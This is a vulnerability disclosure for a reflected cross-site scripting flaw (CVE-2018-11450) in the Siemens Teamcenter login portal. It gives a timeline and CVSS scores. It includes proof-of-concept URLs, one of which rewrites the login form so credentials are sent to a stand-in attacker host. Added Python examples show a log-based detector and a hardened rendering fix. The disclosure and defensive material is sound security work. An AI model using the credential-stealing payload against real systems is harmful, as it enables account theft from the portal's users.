Siemens | Siemens PLM Software TEAMCENTER | Reflected Cross-Site Scripting (XSS) vulnerability
Discoverer: Luc van Donk
Co-Author: Jefferey Hanssen
CVE-ID: CVE-2018-11450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11450
23-05-2018 09:26 Contacted Siemens ProductCERT
23-05-2018 09:45 First reaction
23-05-2018 13:13 Encrypted traffic both ways
23-05-2018 13:29 Provided report on vulnerability in Teamcenter
06-06-2018 15:04 Received confirmation of the vulnerability
06-06-2018 15:58 Notified Siemens that we would like to publish the vulnerability
07-06-2018 14:55 Siemens provided a reserved CVE-ID and listed us on their Hall of Thanks
13-06-2018 13:33 Siemens told us that the first version that is no longer affected is V9.1.3
24-06-2018 Received confirmation from a third party that we are allowed to publish the vulnerability
Siemens
www.siemens.com
Siemens PLM Software TEAMCENTER
https://www.plm.automation.siemens.com/global/en/products/teamcenter/
Version 9.1.2.5
We did not test any other versions, but Siemens told us that the first version that is no longer affected is V9.1.3. We assume that versions prior to 9.1.2.5 are vulnerable as well.
CVSS v2 Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)
- CVSS Base Score: 6.4
- Impact Subscore: 4.9
- Exploitability Subscore: 10.0
- CVSS Temporal Score: 5.3
- CVSS Environmental Score: NA
- Modified Impact Subscore: NA
- Overall CVSS Score: 5.3
Reflected XSS vulnerability
Login portal
Allows an attacker to inject JavaScript into the login portal webpage through the URL.
If a user visits the login portal through a URL crafted by the attacker, the attacker can insert HTML/JavaScript and thus alter or rewrite the login portal page.
This allows the attacker to steal login credentials, redirect the user to a malicious site, or execute browser exploits.
http://SERVER:PORT/tc/webclient?lang=<script>alert("Reflected XSS")</script>
http://SERVER:PORT/tc/webclient?lang=<script>this.LoginForm.action='http://Hackers.Website';this.LoginForm.method='get';</script>
Note: in order to make this link work, you might have to escape the special characters, depending on the software it is targeted at.
An escaped version of the above-mentioned URL might look like this:
http://SERVER:PORT/tc/webclient%3Flang%3D%3Cscript%3Ethis.LoginForm.action%3D%27http://Hackers.Website%27%3Bthis.LoginForm.method%3D%27get%27%3B%3C/script%3E
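Because the same payload can arrive raw, percent-encoded (as in the escaped URL above) or even double-encoded, a log-based detector has to decode the request target before inspecting the lang parameter. The following Python script is an added example written for this page, not code from the advisory or from Siemens; the access-log lines are constructed in Apache combined format, the /tc/webclient path is taken from the advisory, and the rule that "anything that does not look like a plain language tag is suspicious" is an assumption chosen so the detector also catches encodings the advisory does not list.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real Teamcenter or Apache logs).
# Line 2 carries the raw payload, line 3 the percent-encoded form from the
# advisory, line 4 a double-encoded form, line 5 a request to another path.
SAMPLE_LOG = """\
10.0.0.5 - - [23/May/2018:09:26:01 +0200] "GET /tc/webclient?lang=en_US HTTP/1.1" 200 5123
10.0.0.7 - - [23/May/2018:09:27:13 +0200] "GET /tc/webclient?lang=<script>alert(1)</script> HTTP/1.1" 200 5180
10.0.0.9 - - [23/May/2018:09:28:44 +0200] "GET /tc/webclient%3Flang%3D%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5180
10.0.0.9 - - [23/May/2018:09:29:02 +0200] "GET /tc/webclient?lang=%253Cscript%253E HTTP/1.1" 200 5180
10.0.0.11 - - [23/May/2018:09:30:00 +0200] "GET /tc/other?lang=<b>x</b> HTTP/1.1" 404 210
"""

# Combined-log prefix: client, ident, user, [timestamp], "METHOD TARGET PROTO"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) (\S+)"')

# Allowlist shape for a language tag such as "en" or "en_US" (assumption).
LANG_OK = re.compile(r"^[A-Za-z]{2,3}(?:[_-][A-Za-z]{2,4})?$")


def decode_fully(value, max_rounds=3):
    """Percent-decode until the string stops changing, so that a
    double-encoded '<' (%253C) is inspected as '<' and not as '%3C'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_suspicious_lang(log_text):
    """Return (client_ip, decoded_lang_value) for every request to the
    Teamcenter login portal whose lang parameter is not a plain language tag."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, _method, target, _proto = match.groups()
        # Decode the whole target first: the encoded PoC hides '?' and '='
        # as %3F and %3D, so the query string only appears after decoding.
        target = decode_fully(target)
        path, _, query = target.partition("?")
        if not path.startswith("/tc/webclient"):
            continue
        # Split the query manually instead of parse_qs, so ';' inside the
        # injected JavaScript is never treated as a parameter separator.
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            if key == "lang" and not LANG_OK.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in find_suspicious_lang(SAMPLE_LOG):
        print(f"{client}: suspicious lang={value!r}")
```

The allowlist approach (flag everything that is not a language tag) is deliberately stricter than a blocklist of `<script>` strings: it also surfaces event-handler or HTML-only injections without having to enumerate them, at the cost of a few false positives on malformed but harmless clients, which are cheap to triage.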
The exploit consists of the URL that points to the Siemens login portal and includes the lang (language) parameter. By inserting regular JavaScript into this parameter, one can add this code to the webpage. In the example mentioned above, we used the following JavaScript:
<script>
this.LoginForm.action='http://<Hackers.Website>';
this.LoginForm.method='get';
</script>
This code rewrites the type of request and the target of the request issued by the login form. It ensures that the victim’s username and password are submitted (in plain text when HTTP is used) to the attacker’s server. With this simple example an existing web server can be used to retrieve the username and password of the victim simply by looking at the access logs of the web server (for Apache 2 on a Linux system this is located in /var/log/apache2/access.log by default).
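The root cause is that the value of lang is written into the page without validation or output encoding. The following Python snippet is an added example for this page, not Teamcenter code and not Siemens' fix: it places a minimal, constructed login page template (the form name LoginForm comes from the advisory, everything else is invented) next to a reflection that is vulnerable in the way the advisory describes and a hardened one that validates lang against an allowlist and still HTML-escapes at the point of output. The set of allowed language tags is an assumption.

```python
import html
import re

# Constructed allowlist; the product's real list of language tags is not
# known to this example.
ALLOWED_LANGS = {"en_US", "de_DE", "fr_FR", "ja_JP", "zh_CN"}
DEFAULT_LANG = "en_US"
LANG_SHAPE = re.compile(r"^[a-z]{2}_[A-Z]{2}$")

# Minimal stand-in for the login portal page. The lang value is reflected in
# body text, where an injected <script> element would execute.
PAGE_TEMPLATE = (
    "<html><head><title>Login</title></head><body>\n"
    "<p>Language: {lang}</p>\n"
    '<form name="LoginForm" action="/tc/login" method="post">\n'
    '<input name="user"><input name="password" type="password">\n'
    "</form></body></html>"
)


def vulnerable_render(lang):
    """Reflects the parameter verbatim: the behaviour the advisory describes."""
    return PAGE_TEMPLATE.format(lang=lang)


def select_lang(lang):
    """Allowlist validation: any value that is not a known language tag
    falls back to the default instead of being echoed."""
    if lang is not None and LANG_SHAPE.match(lang) and lang in ALLOWED_LANGS:
        return lang
    return DEFAULT_LANG


def escaped_reflection(value):
    """Context-appropriate output encoding for HTML text and attribute values,
    for the cases where a received value genuinely must be shown back."""
    return html.escape(value, quote=True)


def hardened_render(lang):
    """Validate first, then still encode at the output point (defence in depth)."""
    return PAGE_TEMPLATE.format(lang=escaped_reflection(select_lang(lang)))


if __name__ == "__main__":
    payload = '<script>alert("Reflected XSS")</script>'  # PoC string from the advisory
    print("vulnerable:", vulnerable_render(payload))
    print("hardened:  ", hardened_render(payload))
    print("escaped:   ", escaped_reflection(payload))
```

Validation alone would already stop the injected string from reaching the page, but escaping at the output point protects every other place the template might one day reflect the value; the two measures fail independently, which is why both are kept.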
The first version that is no longer affected is V9.1.3